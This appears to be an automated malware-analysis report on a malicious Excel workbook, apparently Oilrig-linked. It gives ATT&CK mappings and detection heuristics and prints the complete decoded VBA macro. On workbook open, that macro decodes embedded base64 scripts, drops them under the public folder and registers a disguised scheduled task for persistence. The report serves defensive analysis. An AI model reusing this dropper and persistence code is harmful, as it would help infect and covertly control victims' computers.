MALICIOUS
488
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The Workbook_Open macro executes a PowerShell command to download and save a VBScript payload. The script uses WScript.Shell to create a folder and then saves the downloaded content as 'backup.vbs' and 'DnE.ps1'. The PowerShell command is constructed using base64 encoded strings, indicating a downloader functionality. The presence of 'powershell -EncodedCommand' and WScript.Shell usage strongly suggests a malicious dropper.
Heuristics 11
-
ClamAV: Xls.Dropper.Agent-6465255-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-6465255-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set DnSPs1 = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 26) Set wss = CreateObject("WScript.Shell") Set fso = CreateObject("Scripting.FileSystemObject") -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
End If cmd = "powershell ""&{$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & BackupVbs & "')); Set-Content '" & pth & "backup.vbs" & "' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & DnEPs1 & "'));$f=$f -replace '__',(Get-Random);$f='powershell -EncodedCommand \""'+([System.Convert]::ToBas" & "e64String([System.Text.Encoding]::Unicode.GetBytes($f)))+'\""'; Set-Content '" & pth & "DnE.ps1" & "' $f;$f=[System.Text.Encod … cmd2 = "schtasks /create /F /sc minute /mo 3 /tn " & Chr(34) & "GoogleUpdateTasksMachineUI" & Chr(34) & " /tr " & pth & "backup.vbs" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set DnSPs1 = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 26) Set wss = CreateObject("WScript.Shell") Set fso = CreateObject("Scripting.FileSystemObject") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Workbook_Open() Call doom_Init -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3325 bytes |
SHA-256: 7ff419cb3d5c950ba3bb9f4a60ce2f41e1512353fc2978cc30040425c5597f9e |
|||
|
Detection
ClamAV:
Vbs.Trojan.Oilrig-6332898-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Call doom_Init
Call doom_ShowHideSheets
End Sub
Sub doom_ShowHideSheets()
If ActiveWorkbook.Worksheets(1).Visible Then
Dim WS_Count As Integer
Dim I As Integer
WS_Count = ActiveWorkbook.Worksheets.Count
For I = 1 To WS_Count
ActiveWorkbook.Worksheets(I).Visible = True
Next I
ActiveWorkbook.Worksheets(1).Visible = False
ActiveWorkbook.Worksheets(2).Activate
End If
End Sub
Sub doom_Init()
Set BackupVbs = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 24)
Set DnEPs1 = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 25)
Set DnSPs1 = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 26)
Set wss = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
pth = wss.ExpandEnvironmentStrings("%PUBLIC%") & "\Libraries\RecordedTV\"
If Not (fso.FolderExists(pth)) Then
fso.CreateFolder (pth)
End If
cmd = "powershell ""&{$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & BackupVbs & "')); Set-Content '" & pth & "backup.vbs" & "' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & DnEPs1 & "'));$f=$f -replace '__',(Get-Random);$f='powershell -EncodedCommand \""'+([System.Convert]::ToBas" & "e64String([System.Text.Encoding]::Unicode.GetBytes($f)))+'\""'; Set-Content '" & pth & "DnE.ps1" & "' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & DnSPs1 & "'));$f='powershell -EncodedCommand \""'+([System.Convert]::ToBas" & "e64String([System.Text.Encoding]::Unicode.GetBytes($f)))+'\""';Set-Content '" & pth & "DnS.ps1" & "' $f}"""
cmd2 = "schtasks /create /F /sc minute /mo 3 /tn " & Chr(34) & "GoogleUpdateTasksMachineUI" & Chr(34) & " /tr " & pth & "backup.vbs"
If Not (fso.FileExists(pth & "backup.vbs")) Then
If Not (fso.FolderExists(pth & "up")) Then
fso.CreateFolder (pth & "up")
End If
If Not (fso.FolderExists(pth & "dn")) Then
fso.CreateFolder (pth & "dn")
End If
If Not (fso.FolderExists(pth & "tp")) Then
fso.CreateFolder (pth & "tp")
End If
wss.Run cmd, 0
wss.Run cmd2, 0
Set wss = Nothing
Set fso = Nothing
End If
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.